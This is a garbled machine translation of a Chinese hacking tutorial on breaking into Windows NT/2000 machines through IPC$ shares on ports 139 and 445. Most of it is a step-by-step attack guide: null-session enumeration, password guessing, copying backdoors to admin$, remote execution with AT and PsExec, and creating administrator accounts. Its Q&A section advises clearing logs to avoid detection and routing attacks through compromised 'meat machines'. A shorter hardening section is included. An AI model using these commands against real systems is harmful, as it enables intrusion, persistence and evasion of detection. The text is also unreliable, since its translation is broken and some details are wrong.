445port Intrusion Detail Explanation

445port Intrusion Detail Explanation
About "445port intrusion" content
445port Intrusion Detail Explanation
Site search for many other "445port intrusion" content

445port invasion, we used to look at the first or 445port early to go, become intrusive port?
445port is the default port for the IPC service
ipc$
A summary
Two what is ipc$
Three what is a null session
What can four empty sessions do
The port used by the five ipc$
The significance of six IPC pipelines in hack attack
Seven ipc$ common causes of connection failures
Eight reasons why a copy file failed
Ix. limitations on the AT command and XP for ipc$
How to open the target ipc$ share and other shares
Some orders that require the shell to finish.
12 commands that may be used in an intrusion
13 control of past and present ipc$ invasions
14 How to prevent ipc$ invasion
Ipc$ Invasion Quiz Selection
16 at the end.
A summary
There are a plethora of articles on the internet about the ipc$ invasion, and the attack steps have even become a curing pattern. So no one wants to take out the things that have become a stereotype.

Just say that, I think these articles are not specific explanation. Some of the content was even wrong, so the question of ipc$ almost half of the security Forum's discussion areas. And these problems are often repeated, seriously affect the quality of the forum and learning efficiency, so I summed up this article, I hope to be able to ipc$ this part of things as clear as possible.
Note: The various scenarios discussed in this article are defaulted to the win nt/2000 environment, and Win98 will not be included in this discussion.
Two what is ipc$
ipc$ (Internet Process Connection) is a resource that shares a named pipe, which is a named pipe that is open for interprocess communication, by providing a trusted username and password that connects two parties to establish a secure channel for exchanging encrypted data with this channel To enable access to remote computers. Ipc$ is a new feature of nt/2000. It has a feature that at the same time, two IPs only agree to establish a connection.

nt/2000 when the ipc$ feature is provided, the default share is also turned on when the system is first installed. That is, all logical sharing (c$,d$,e$ ...) and system catalog Winnt or Windows (admin$) sharing. All of this. Microsoft's original intention is to facilitate the management of administrators, but in the intentional and unintentional, resulting in a reduction in system security.
Usually we can always hear someone say ipc$ loopholes, ipc$ loopholes, in fact ipc$ is not a real sense of the loophole, I think the reason someone said that, must be referring to Microsoft's own placement of the ' backdoor ': null session (NULL).

So what is a null session?
Three what is a null session
Before we introduce a null session, it's important to understand how a secure session is built.

In Windows NT 4.0, the Challenge Response protocol is used to establish a session with a remote machine. Establishing a successful session will become a secure tunnel, establishing two parties to communicate information through it, the approximate order of the process such as the following:
1) The session requestor (client) transmits a packet to the session recipient (server), requesting the establishment of a secure tunnel;
2) The server generates a random 64-digit number (Implementation challenge) to transfer back to the customer.
3) The client obtains this 64-digit number generated by the server, disrupts it with the password of the account attempting to establish the session, and returns the result to the server (implementing the response);
4) When the server accepts a response and sends it to the local Security authentication (LSA), the LSA verifies the requestor's identity by using the correct password for the user to verify the response. Suppose the requestor's account is the local account of the server. Verify that the requested account is a domain account, and the response is routed to the domain controller to verify. When the response to the challenge is verified as correct, an access token is generated and then delivered to the customer. The client uses this access token to connect to resources on the server until the proposed session is terminated.
The above is a general procedure for establishing a secure session. So what about the empty session?
A null session is a session established with the server without trust (that is, username and password are not provided), but based on the WIN2000 access control model. The creation of a null session requires a token, but the null session is not authenticated by the user information during the establishment process, so the user information is not included in this token. This session does not allow encrypted information to be sent between the systems, but this does not mean that the security identifier SID is not included in the token for a null session (it identifies the user and the owning group), for a null session. The SID of the token provided by the LSA is s-1-5-7. This is the SID of the null session, username is: ANONYMOUS LOGON (this username can be seen in the list of users. However, it cannot be found in the SAM database, which is part of the system's built-in account, and this access token includes the following spoofed groups:
Everyone
Network
Under the restrictions of the security policy. This empty session will be authorized to access all the information that the two groups above have permission to ask. So what can you do to establish a null session?
What can four empty sessions do
For NT, under Default security settings. With an empty connection, it is possible to enumerate the users and shares on the target host, access the share of the permissions of everyone, visit a small number of brochures, and so on, with little or no significant value, and a smaller effect on 2000, due to the Windows In the 2000 and later version numbers, only Administrators and Backup Operators have the right to access the registration form from the network, and it is not convenient to implement them, and tools are required.
From these we can see that such a non-trusted session is not of much use, but from a full ipc$ invasion, a null session is an essential springboard, as we can get a list of users from it. Most weak password scanning tools Use this user list for password guessing. The successful export user list greatly adds the success rate of the guess, which is enough to explain the security implications of the null session. So it is wrong to say that null sessions are useless. Here are some specific commands that you can use in a null session:
1 First, let's set up a null session (which, of course, requires a target open ipc$)
Command: NET use \\ip\ipc$ ""/user: ""
Note: The above command includes four spaces, net and use have a space in the middle. Use the back one, password around a space.
2 Viewing shared resources for a remote host
Command: NET view \\ip
Explanation: If an empty connection is established, use this command to view the shared resources of the remote host. Let's say it's open for sharing. Can get results such as the following, but this command cannot display the default share.
Shared Resources in \\*.*.*.*
Resource Share name Type purpose gaze
-----------------------------------------------------------
NETLOGON Disk Logon Server share
SYSVOL Disk Logon Server share
Command completed successfully.
3 Viewing the current time of a remote host
Command: NET time \\ip
Explanation: Use this command to get the current time of a remote host.

4 Get the NetBIOS username list of the remote host (need to open your own NBT)
Command: NBTSTAT-A IP
Use this command to get a list of NetBIOS username for a remote host. Returns such as the following result:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
Oyamanishi-h <00> GROUP Registered
Oyamanishi-h < 1C > GROUP registered
SERVER <20> UNIQUE Registered
Oyamanishi-h <1B> UNIQUE Registered
Oyamanishi-h <1E> GROUP Registered
SERVER <03> UNIQUE Registered
Oyamanishi-h <1D> UNIQUE Registered
.. __msbrowse__.<01> GROUP Registered
Inet~services < 1C > GROUP registered
is~server......<00> UNIQUE Registered
MAC Address = 00-50-8b-9a-2d-37
The above is what we often do with empty sessions, as if we can get a lot of things yo, just to note that the operation to establish a ipc$ connection will leave a record in the Event log, regardless of whether you log in successfully. All right. So let's take a look at what Port ipc$ is using?
The port used by the five ipc$
First, let's look at some basic knowledge:
1 smbserver Message Block) Windows protocol family for file print sharing services;
2 Nbtnetbios over TCP/IP) uses 137 (UDP) 138 (UDP) 139 (TCP) port to implement a NETBIOS network interconnect based on the TCP/IP protocol.
3 in WindowsNT SMB is based on NBT implementation, that is, using 139 (TCP) port, whereas in Windows2000, SMB is implemented directly through the 445 port in addition to NBT-based implementations.
With this basic knowledge. We'll be able to go further and discuss the choice of the network share for port:
For Win2000 Client (initiator):
1 assume that when you connect to the server with NBT consent, the client tries to access 139 and 445 port at the same time. Suppose 445 port has a response. Then send the RST package to 139 port to disconnect. Use 455 port for the session. Use 139 port when 445 port is not responding, assuming that two ports are not responding. The session fails;
2 If the server is connected without NBT, then the client will only attempt to access 445 port. Assuming that 445 port is unresponsive, the session fails.
For the Win2000 server side:
1 Assume consent NBT, then UDP Port 137, 138, TCP port 139, 445 will be open (LISTENING).
2 assume that NBT is forbidden. Then there is only 445 port open.
The ipc$ session we established is the same as the choice of port to follow the above principles.

Obvious. Assume that the remote server is not listening on 139 or 445 port. The ipc$ session cannot be established.

The significance of six IPC pipelines in hack attack
The IPC pipeline was originally designed to facilitate remote management by administrators. But in the eyes of the intruder, the mainframe that opened the IPC pipeline seemed more accessible.

Through the IPC pipeline, we are able to remotely invoke some of the system functions (mostly through tools, but with the corresponding permissions). This is often the key to the success of the invasion.

Assuming that these are not taken into account, the IPC pipeline has already given the intruder a lot of support, and has even become the most important means of transmission, so you can always see some friends in various forums who are helpless to help themselves because they can't open the IPC pipe of the target machine. Of course. Nor can we overlook the important role that authority plays in the IPC pipeline. Surely you have tasted the embarrassment of the empty session, no authority, open the pipeline we also helpless. But once the intruder gets the administrator's permission. Then the IPC pipe this double-edged sword will show its hideous side.
Seven ipc$ common causes of connection failures
The following are some common causes of ipc$ connection failures:
1 IPC connection is a feature unique to Windows NT and above, because it needs to use very many DLL functions in Windows NT, so it can't be executed in Windows 9.x/me system, that is to say, only nt/2000/xp can build each other ipc$ Connection, 98/me is unable to establish ipc$ connection;
2 false assumption the successful establishment of a ipc$ connection, it is necessary for the responder to turn on the ipc$ share, even if it is an empty connection, assuming that the responder closed the ipc$ share, will not establish a connection;
3 The connection initiator does not start the LanmanWorkstation service (display named: Workstation): It provides network links and communication, and no initiator can initiate a connection request.
4 The responder does not start the LanManServer service (display named: Server): It provides RPC support, file, print, and named pipe sharing. Ipc$ relies on this service. Without it the host will not be able to respond to the initiator's connection request, except that it can still initiate a ipc$ connection;
5 The responder does not start the NetLogon, which supports the computer pass-through account login status on the network (this is just not the case);
6 The 139 of the responder, 445 port is not in the listening state or blocked by the firewall;
7 Connection Initiator does not open 139, 445 port;
8 Username or password error: Assume such an error occurred. The system will give you an error message similar to ' Unable to update password ' (apparently null sessions exclude such errors).
9 Command input Error: May be more or less space, when the username and password are not included in the space between the two arguments can be omitted, assuming that the password is empty, can be directly input two "".
10 assume that the other party restarts the computer if the connection is already established. Then the ipc$ connection will be disconnected on its own, and the connection needs to be established again.

In addition, you can analyze the cause based on the error number returned:
Error number 5, denial of access: it is very likely that the user you are using is not an administrator;
Error number 51. Windows cannot find the network path: There is a problem with the network;
Error number 53. Network path not found: IP address error. The target is not powered on. The target LanManServer service is not started. The target has a firewall (port filtering).
Error number 67, the network name could not be found: your LanmanWorkstation service was not started or the target was deleted ipc$;
Error number 1219, the supplied credential conflicts with an existing set of credentials: you have established a ipc$ with each other, please remove the re-connected;
Error number 1326, unknown username or error password: The cause is very obvious.
Error number 1792, attempting to log on. However, the network Logon service does not start: The target NetLogon service is not started;
Error number 2242, the user's password has expired: The target has an account policy. Force periodic requests to change password.
Eight reasons why a copy file failed
Some friends, despite the successful establishment of the ipc$ connection. However, in the case of copy with such a trouble, can not replicate the success, then the cause of the common causes of replication failure?
1 The other party does not open the shared directory
This type of error occurs most, accounting for more than 50%.

Many friends after the ipc$ connection was established successfully. Do not even know whether the other party has a shared directory, the blind copy. The result is that replication failed and depressed very much. So I suggest that you make sure to use NetView \\IP This command to see if the shared directory you want to copy exists (and, of course, better with software) before you replicate it. Do not feel that you can establish a ipc$ connection there must be a shared directory exists.

2 failed to share replication to default
This kind of mistake is also commonly committed by everyone, there are two main aspects:
1) The wrong feel can establish the ipc$ connection of the host must turn on the default share. Therefore, when the connection is established, the default shared copy files such as c$,d$,admin$, once the other party does not turn on the default share, will cause replication to fail.

ipc$ connection success only means that the other party opened the ipc$ share, does not indicate that the default share must exist. Ipc$ sharing is not the same as the default share. Ipc$ sharing is a named pipe, not the actual directory, and the default share is a real shared directory;
2) because the net View \\IP command cannot display the default shared directory (due to the default share with $). Therefore, with this command, we cannot infer whether the other party has opened the default share. Therefore, assuming that the other party does not turn on the default share, all operations to the default share will not succeed, except that most scanning software is at the same time as the weak password. Can be swept to the default shared directory to prevent such errors from occurring)
Key points: Please be sure to distinguish between IPC sharing, default sharing, common sharing the difference: IPC Sharing is a pipeline, not an actual shared directory; The default share is the directory that is opened by default at the time of installation, and common sharing is the shared directory on which we can set permissions.

3 Insufficient user rights, including four scenarios:
1) When a null connection is replicated to all shares (default share and normal share). permission is not enough;
2) When replicating to the default share, in the Win2000 Pro Edition, only the Administrators and Backup Operators group members are sufficient, and the WIN2000 server version number Server Operatros group can also access these Enjoy the catalogue;
3) When copying to a normal share, you must have the corresponding permission (that is, the access rights that the other administrator set beforehand).
4) The other party can pass the firewall or security software settings. Prohibit external access to share;
Attention:
1 do not feel that administrator must have administrator rights, the administrator name can be changed
2 administrators will be able to access the default shared directory, but will not necessarily be able to access common shared directories. Since administrators are able to access the common shared directory permissions setting, 6. The access permission set by the administrator for the D drive is only for users who have consented to the directory named Xinxin, so even if you have administrator privileges, you still cannot access D-disk.

It's just interesting to assume that at this point the other party opens the d$ default share. Then you are able to access the d$, bypassing the permission limits. Interested friends can do their own tests.

4 killed by firewall or on LAN
In another case, your copy operation might have been successful, but when it was executed remotely, it was killed by the firewall, causing no files to be found. Or you copy the Trojan to the local area network host, resulting in a connection failure (the reverse connection of the Trojan will not happen this situation). Suppose you didn't think of such a situation, you would think it was a duplication problem, but actually your copy operation has been successful, just the execution of the problem.
Hehe, we also know that ipc$ connection in the actual operation of the process will appear a variety of problems, above I summed up is just a few common mistakes, did not mention. You can give me a wake up call.

Ix. limitations on the AT command and XP for ipc$
I would also like to say the reason for the failure of the at remote execution program, but considering the success rate of at is not very high, the problem is also very much, here does not mention it (the more.) The more people to use, but recommend that you use Psexec.exe remote execution program, if you want the remote machine to execute the local C:\xinxin.exe file, and the administrator is administrator, password 1234, then enter the following command:
PsExec \\ip-u administrator-p 1234-c C:\xinxin.exe
Assuming that an IPC connection has been established, the-u-p of these two parameters does not require that Psexec.exe will voluntarily copy the file to the remote machine and execute it.
The ipc$ in XP would not want to discuss it here. Want to come out alone to discuss, but see more and more friends are very eager to ask why encountered XP, most of the operations are very difficult to succeed.

I'll simply mention it here, in the default security options for XP, no matter what the remote access is only given to guest permissions. This means that even if you are using an administrator account and password, the permissions you get are only Guest. As a result, most operations fail due to insufficient permissions, and there is no good way to overcome this limitation until now. So assuming you really got XP admin password, I suggest you try to avoid the IPC pipeline.

How to open the target ipc$ share and other shares
The ipc$ of the target is not easy to open. Otherwise the world will be upset. You need a shell with admin privileges, such as Telnet, trojan, cmd redirect, etc., and then execute it under the shell:
NET share ipc$
ipc$ sharing of open targets.
NET share ipc$/del
Close the target's ipc$ share; If you want to open a shared directory for it, you can use:
NET share Xinxin=c:\
This opens its C drive as a shared directory named Xinxin. (but I found that a lot of people mistakenly feel that the command to open a shared directory is net share C $, but also swept to the rookie point, really fraught). Again, these operations are accomplished under the shell.

Some orders that require the shell to finish.
See a lot of tutorials this writing is very inaccurate, some need shell talent finished command is simple in the ipc$ connected under the execution. Have a misleading effect. So here's a summary of the commands I need to finish at the shell:
1 Establish a user to the remote host. Activate user, change user password. The operation to join the management group needs to be completed under the shell;
2 Open the ipc$ share for the remote host, shared by default. Common shared operations need to be completed under the shell;
3 Perform/Shut down the remote host service. Need to be finished under the shell;
4 Start/Kill the remote host process, also need to complete under the shell (with the exception of software.) such as PsKill).
12 commands that may be used in an intrusion
For the completeness of this tutorial, I have listed some of the frequently used commands in the ipc$ invasion, assuming you have mastered these commands. You can skip this section to see the following content.

Note that these commands are for local or remote, assuming that they apply only locally. You can only access the remote host's shell (such as CMD. Telnet, etc.). Ability to perform to remote hosts.
1 Create/delete ipc$ connection commands
1) Establish an empty connection:
NET use \\127.0.0.1\ipc$ ""/user: ""
2) Establish a non-null connection:
NET use \\127.0.0.1\ipc$ "password"/user: "username"
3) Delete the connection:
NET use \\127.0.0.1\ipc$/del
2 operating commands for remote hosts in a ipc$ connection
1) View the shared resources of the remote host (the default share is not visible):
NET view \\127.0.0.1
2) View the current time of the remote host:
NET time \\127.0.0.1
3) Get the NetBIOS username list of the remote host:
Nbtstat-a 127.0.0.1
4) Map/delete remote share:
NET use Z: \\127.0.0.1\c
This command maps a shared resource named C to a local Z-disk
NET use Z:/del
Delete the mapped z-disk. Other disk and analogy
5) Copy files to the remote host:
Copy path \ file name \\IP\ shared directory name, such as:
Copy C:\xinxin.exe \\127.0.0.1\c$ is about to copy the Xinxin.exe under C drive to the other side C drive
Of course, you can also copy files from a remote host to your own machine:
Copy \\127.0.0.1\c$\xinxin.exe c \
6) Remote Join the scheduled task:
At \\IP time program name such as:
At \\127.0.0.0 11:00am Xinxin.exe
Note: Try to use the 24-hour system as much as possible; Assume that the program you plan to execute does not add paths under the system default search path (for example, system32/), otherwise the full path must be added
3 Local Commands
1) View the shared resources of the local host (you can see the local default share)
NET share
2) Get a list of local host users
NET user
3) Display account information for a local user
NET User account name
4) Displays the service currently started by the local host
net start
5) Start/close Local Service
Net START service Name
NET stop service Name
6) Join the account locally
NET user account name Password/add
7) activating the disabled user
NET UESR account name/active:yes
8) Join the Admins group
net localgroup Administrators account name/add
Obviously, although these are local commands, suppose you enter them in the remote host's shell, for example, if you enter these commands after Telnet succeeds, these local inputs will be on the remote host.

4 some other commands
1) Telnet
Telnet IP Port
Telnet 127.0.0.0 23
2) Use Opentelnet.exe to turn on remote host Telnet
OpenTelnet.exe \\IP Administrator account password NTLM authentication method port
OpenTelnet.exe \\127.0.0.1 Administrator "" 1 90
Just this gadget needs to meet four requirements:
1) The target is open ipc$ sharing
2) You need to have admin password and account number
3) The target opens the RemoteRegistry service, the user can change the NTLM authentication
4) Valid for WIN2K/XP only
3) Use Psexec.exe one step to get shell, need IPC pipeline support
Psexec.exe \\IP-u Administrator Account-p password cmd
Psexec.exe \\127.0.0.1-u administrator-p "" cmd
13 control of past and present ipc$ invasions
Since it's a control. So I'm going to write to you about the past ipc$ invasion steps. are pretty classic steps:
[1]
C:\>net use \\127.0.0.1\ipc$ ""/user:admintitrators
\ \ Use a swept null password to establish a connection
[2]
C:\>net View \\127.0.0.1
\ \ View a remote shared resource
[3]
C:\>copy Srv.exe \\127.0.0.1\admin$\system32
\ \ Copy the disposable backdoor Srv.exe to the other's system directory. The premise is that admin$ opens
[4]
C:\>net Time \\127.0.0.1
\ \ View the current time of the remote host
[5]
C:\>at \\127.0.0.1 Time Srv.exe
\ \ Executes the Srv.exe remotely with the AT command. Requires the other party to open the ' Task Scheduler ' service
[6]
C:\>net Time \\127.0.0.1
\ \ Check the current time again to estimate if Srv.exe has been executed, this step can omit
[7]
C:\>telnet 127.0.0.1 99
\ \ Open a new form and remotely log in to 127.0.0.1 with telnet to get a shell (what does the shell mean?) Then think of it as the control of the remote machine. Operations like DOS). The Srv.exe port is the one-time backdoor port opened by the
[8]
C:\winnt\system32>net start Telnet
\ \ We started the remote machine's Telnet service in the shell that just landed. After all, Srv.exe is a disposable back door, we need a long back door for later access. Assuming that the other person's telnet has started, this step can be omitted
[9]
C:\>copy Ntlm.exe \\127.0.0.1\admin$\system32
\ \ In the original form will pass Ntlm.exe, Ntlm.exe is used to change the Telnet authentication
[10]
C:\winnt\system32>ntlm.exe
\ \ Executes the ntlm.exe in the shell form, and you will be able to telnet to the host in the future.
[11]
C:\>telnet 127.0.0.1 23
\ \ telnet to 127.0.0.1 in the new form. Port 23 can be omitted. So we get a long back door.
[12]
C:\winnt\system32>net User account name Password/add
C:\winnt\system32>net UESR Guest/active:yes
c:\winnt\system32>net localgroup Administrators account name/add
\\telnet later on. You can create a new account and activate guest. Add any account to the Admins group, etc.
Okay, here I am. I seem to be back in 2. 3 years ago, that was the ipc$ of the day, but with the advent of new tools, some of the tools and commands mentioned above are now less frequently used. So let's take a look at today's efficient and simple ipc$ invasion.
[1]
Psexec.exe \\IP-u Administrator Account-p password cmd
\ \ With this tool we can one step get the shell
OpenTelnet.exe \\server Administrator account password NTLM authentication method port
\ \ Use it to easily change the way Telnet is validated and port. Convenient for us to login
[2]
There is no second step, after a step to get the shell, you can do anything, the back door can be used WinShell. Cloning using CA bar, open terminal with 3389.VBE, record password with Win2kpass. In short, there are many good tools, as you choose. I'm not going to say much.
14 How to prevent ipc$ invasion
1 suppress NULL connections for enumeration (this operation does not prevent the establishment of an empty connection)
To execute regedit, find for example the following primary key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] Change the key value of RestrictAnonymous = DWORD to: 1
If set to "1", an anonymous user can still connect to the ipc$ share. However, this connection does not give you permission to enumerate SAM accounts and share information. "2" has been added to Windows2000, and users who do not have anonymous rights will not be able to ipc$ empty connections.

The recommended setting is 1.

Assume that the primary key mentioned above does not exist. Create a new one and then change the key value.

If you feel that you are in trouble with the registry, you can set this in your local security settings: Local Security Settings-Local Policies-security options-' additional restrictions on anonymous connections '
2 disable default sharing
1) View local shared resources
performing-cmd-input net share
2) Delete Share (default share still exists after restart)
net share ipc$/delete
net share admin$/delete
net share C $/delete
net share d$/de Lete (assuming e,f, ... can continue to delete)
3) Stop the Server service
net stop server/y (again after the server service is turned on)
4) prevent itself from actively opening the default share (this operation does not turn off ipc$ sharing)
Execution- Regedit
Server Edition: Locate the following primary key [Hkey_local_machine\system\currentcontrolset\services\lanmanserver\parameters] for example The key value of AutoShareServer (DWORD) is changed to: 00000000.
Pro Edition: Find such as the following primary key [Hkey_local_machine\system\currentcontrolset\services\lanmanserver\parameters] put AutoShareWks ( DWORD), change the key value to: 00000000.
These two key values do not exist on the host by default. Need to manually join yourself. Restart the machine after the change to make the settings effective.
3 Turn off ipc$ and default share dependent services: Server service
Assuming you really want to turn off ipc$ sharing, disable the Server service:
Control Panel-Administrative Tools-services-Find the Server service (right-click)-Properties-Frequently -Boot type-selected disabled, you may be prompted to say: The XXX service will also shut down whether to continue, because there are some secondary services to rely on the server service, do not control it.

4 shielded 139, 445 port
Without the support of the above two ports, ipc$ cannot be established. So shielding 139, 445 port is the same can prevent ipc$ intrusion.

1) 139 port can block by blocking NBT
Local Area Connection-tcp/it Properties-Advanced-WINS-select ' Disable NETBIOS on tcp/it '
2) 445 port can be blocked by altering the register
Add a key value
Hive:hkey_local_machine
Key:system\controlset\services\netbt\parameters
Name:smbdeviceenabled
Type:reg_dword
value:0
Restart the machine after the change is complete
Note: If you block out the above two ports, you will not be able to invade others with ipc$.
3) Install firewall for port filtering
6 set complex password. Prevent by ipc$ poor cite password. I think this is the best way. Increased security awareness, more secure than the constant patching.

Ipc$ Invasion Quiz Selection
It says a lot of theoretical stuff, but in practice you will have all kinds of problems, so in order to give you the best help. I've sorted out some of the most representative questions and answers in the security forums, some of which I've given, some of which are responses from the forum, and suppose there are questions. Be able to come to me for discussion.
1. When the ipc$ intrusion is made, the records are left in the server, is there any way to keep the server from discovering it?
A: Leave a record is certain, you go after using clear log program Delete can, or with broiler invasion.
2. What you see below is why you can connect but not copy
NET use \\***.***.***.***\ipc$ "password"/user: "username"
Command succeeded
Copy Icmd.exe \\***.***.***.***\admin$
The network path could not be found
Command not successful
A: A problem like "No network path found", "Network name not found". Mostly because the shared directory you want to copy is not turned on, so there will be errors when copying, and you can try to find other shared directories.
3. Assume that the other side opened the ipc$, and can establish an empty connection, but open C, D disk, are required to password, I know that there is no too much access to empty connections, but there is no other way?
A: We recommend using streamer or some other scanning software to try to guess the password. Suppose you can't guess. Only can give up, after all, the ability of empty connection is limited.
4. I have guessed the administrator's password, and have ipc$ the connection succeeded, but net view \\ip found that it did not open the default share, what should I do?
A: First correct one of your mistakes. With the net view \\ip you can't see the default share, you can try to copy the file to C $, d$ look, if not. It means that he has closed the default share, so you can use Opentelnet.exe or Psexec.exe bar, using the method above.
5.ipc$ the connection was successful, I set up an account with the following command, but found this account on my own machine, what's going on?
NET Uset Ccbirds/add
A: ipc$ success simply means you have a communication tunnel with a remote host, and that doesn't mean you've got a shell. Just after you get a shell (for example, Telnet), you have the ability to create an account on the remote machine, otherwise your operation is only done locally.

6. I have entered a meat machine, using the administrator account. Can see his system time, but copy the program to his machine but not, each prompt "refused to interview." 0 files copied. " is not the other party has what service did not open, what should I do?
A: Generally speaking, "Deny access" is the result of insufficient permission, possibly the account you use has a problem. Another possibility, assuming that you want to copy files to a common shared directory and return this error, indicates that the consent of this directory setting does not include you (even if you are an administrator), as I analyzed in the previous installment.
7. Can I use Win98 to establish ipc$ connection with each other?
A: Theoretically not, to carry out ipc$ operation, the proposed use of Win2000, with other operating systems will bring a lot of unnecessary trouble.
8. I have successfully established a null session with net use \\ip\ipc$ "/user". But the user list cannot be exported with Nbtstat-a IP, which is why?
A: A null session is capable of exporting a list of users by default, but assuming that the administrator has disabled the export list by altering the registration form, you will be given the situation. It is also possible that your own NBT was not opened, and the Netstat command was built on NBT.

　　
9. When I establish a ipc$ connection, the following information is returned, for example: ' The supplied credential conflicts with an existing set of credentials ', what's going on?
A: Oh, this indicates that you have established a ipc$ connection with the target host. Two hosts the same time to establish two ipc$ connections is not agreed.
10. I appear in the map:
F:\>net Use H: \\211.161.134.*\e$
The system has a 85 error.
The local device name is already in use. What's going on?
A: You are too careless, it means that you have an H-disk, map to the letter of the No!

11. I created a connection f:\>net use \\*.*.*.*\ipc$ "123"/user: "Guest" succeeded, but when I mapped an error occurred, I wanted to password. What's going on?
F:\>net Use H: \\*.*.*.*\c$
Password is invalid in \\*.*.*.*\c$.
Please type \\*.*.*.*\c$ password:
The system has a 5 error.
Refusal to access the interview.
Answer: hehe. To you to password that you are currently using the user rights are not enough, you can not map C $ this default share, ways to improve permissions or find the administrator's weak password!

The default share usually requires administrator privileges.

12. I used Superscan to sweep to a host that opened the 139 port, but why can't I have a null connection?
A: You confuse the relationship between ipc$ and 139. The host that can make the ipc$ connection must open 139 or 445 port, but the host of the two ports may not be able to connect empty, because the other side can turn off ipc$ sharing.
13. Our LAN machine is mostly XP, I use Streamer scan to several administrator account password is empty. And be able to connect. But can't copy things, say error 5.

May I ask why?
A: XP is much more secure. In the default settings for security policy. When authenticating to a local account's network login, the guest privilege is implied, even if you log on remotely with the administrator, and you only have guest permissions, so you copy the file, of course Error 5: Insufficient permissions.
14. I used net use \\192.168.0.2\ipc$ "password"/user: "Administrator" succeeds, but NET uses I: \\192.168.0.2\c
appears please type \\192.168.0.2 password, how to return to the matter? I use it, but the administrator? Should have access to anything?
A: Although you have administrator privileges. However, when the administrator sets the C-Drive sharing permissions (note: Normal sharing can set access permissions.) The default share does not) may not have been set to consent to administrator access, so this problem occurs.
15. If your machine prohibits ipc$, is it possible to use ipc$ to connect other machines? What if the server service is forbidden?
A: Prohibit the above two can still initiate the ipc$ connection, just such a problem of self-test will be better.

16. Can you tell me the reason for the following two errors?
C:\>net Time \\61.225.*.*
The system has a 5 error.
Refusal to access the interview.
C:\>net View \\61.225.*.*
The system has a 5 error.
Refusal to access the interview.
A: I was very puzzled when I first encountered this problem, error 5 means insufficient permissions. But the privileges of a null session can be completed two commands above, why can't he? Did he not establish a connection? Then the careless comrade told me it was true, and he forgot that he had deleted the ipc$ connection. He then entered the two commands above. The error 5 occurs with it.
17. You see what's going on here?
F:\>net time
The time server could not be found.
Please type NET helpmsg 3912 for a lot of other help.
Answer: The answer is easy. Your order is wrong and should be net time \\ip
No input IP address, of course not found server. View the command should have an IP address. That: NET view \\ip

Collect share Scores

445port Intrusion Detail Explanation